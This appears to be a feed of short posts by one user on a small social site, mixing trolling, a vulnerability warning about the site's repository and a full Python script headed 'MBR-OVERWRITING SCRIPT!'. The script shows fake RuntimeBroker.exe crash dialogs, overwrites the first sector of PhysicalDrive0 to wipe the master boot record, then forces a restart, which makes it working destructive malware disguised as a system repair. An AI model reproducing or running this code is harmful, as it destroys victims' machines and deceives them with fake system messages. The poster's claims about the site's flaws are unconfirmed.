@disease

im trolling, yall are so funny XD
Wall

erm, what the sigma?

Can anyone look at this repo and tell me if the BOMB/bomb.py file should have any fixes? (its still being developed, i just want opinions)

honestly, i really do fw this site and its sorta large community. It is a little buggy client side(i guess?)… hasn’t the owner spent 900$+ on it over the time it has been up??? (idk, i forgot when i was looking at it)

ya’ll don’t realize i’m trolling? :D

A little info about me: I was one of the developers for the “small social media” site called *https://rainydais.com/*, i helped with the security, management, and development with the owner… until we had a miscommunication and he kicked me off the team :’(

anyways, i have been in lead development with small socials like this one and just want to look out for the users. please take into consideration what i have said in my recent post. @jeffalo and the rest of staff!

warning!

From the tests i have done, there are many vulnerabilities on this website, there are also a lot of bugs. Example: when posting something, if you spam click `post` it will create a post for every time you click the button, there should be an implementation to limit the time between posts and to make the button a one time click. (THIS BUG MAKES THE SITE LAG!). it’s also a pain to delete all of the posts if you accidentally do so as the site refreshes but will still lag and there is a small chance that the post will not be deleted. There is also a password vulnerability… maybe don’t have the user’s passwords get stored as a plain document.

THERE ARE VULNERABILITIES IN THE REPO! Yes, even tho the repo is the legacy site and isn’t used anymore it is still good to state the vulnerabilities on the repo as people might use the template to make their own site like this and won’t know of the vulnerabilities in the code:

List of the vulnerabilities on the repo: SQL Injection, Cross-Site Scripting (XSS), Insecure Direct Object Reference (IDOR), Lack of Input Validation, Insecure, Outdated Dependencies, Lack of Error Handling, Insecure Session Management, Storage of Sensitive Data (user and password information: Insecure Password Storage, Weak Password Hashing, Lack of Password Salting, Insecure Password Verification, Missing Password Complexity Requirements, Insecure Password Reset Token Generation, Insecure Password Storage in Sessions), Lack of Secure Communication… sry <3

erm, what the sigma? MBR-OVERWRITING SCRIPT!

import os  import time  from os import system  from subprocess import call  os.system('pip install pywin32')  from win32file import *  from win32ui import *  from win32con import *  from win32gui import *  from sys import exit   time.sleep(2)  warningtitle = 'Program crashed - RuntimeBroker.exe' warningdescription = 'The instruction at 0x00007FF950FCBE4B reference memory at 0x000000000000024, The memory could not written.           Would you like to restart?'  if MessageBox(warningdescription, warningtitle, MB_ICONWARNING | MB_YESNO) == 7:    MessageBox("RuntimeBroker.exe is very inportant, your pc could run into many falulars, would you like to restart RuntimeBroker.exe", "Alert - RuntimeBroker.exe", MB_ICONWARNING | MB_OK)  hDevice = CreateFileW("\\\\.\\PhysicalDrive0", GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, None, OPEN_EXISTING, 0,0) # Create handle WriteFile(hDevice, AllocateReadBuffer(512), None) # Overwrite MBR! CloseHandle(hDevice) # Close the handle  MessageBox("RuntimeBroker.exe has been fixed, please contact microsoft support if any other problems occur.", "Restarted - RuntimeBroker.exe", MB_ICONWARNING | MB_OK)  time.sleep(120) MessageBox("Your PC requires a restart. (Reason: Master Boot Record(MBR) has been changed) Please click 'ok' to restart.", "System", MB_ICONWARNING | MB_OK)   os.system("shutdown /r /t 1") # restart

I love finding small social-media’s like this. I love looking through the communities and seeing all of the silly things people post :P

Hello, World! I’m new here :P

Check out my GitHub! https://github.com/CPScript (I personally don’t think i post anything useful there), I’m highly skilled in cyber-security, networking, machine learning, and more. I’m 17 and have multiple certifications(8/500$ each) on the skills i have. You can do anything as long as you put your mind to it! <3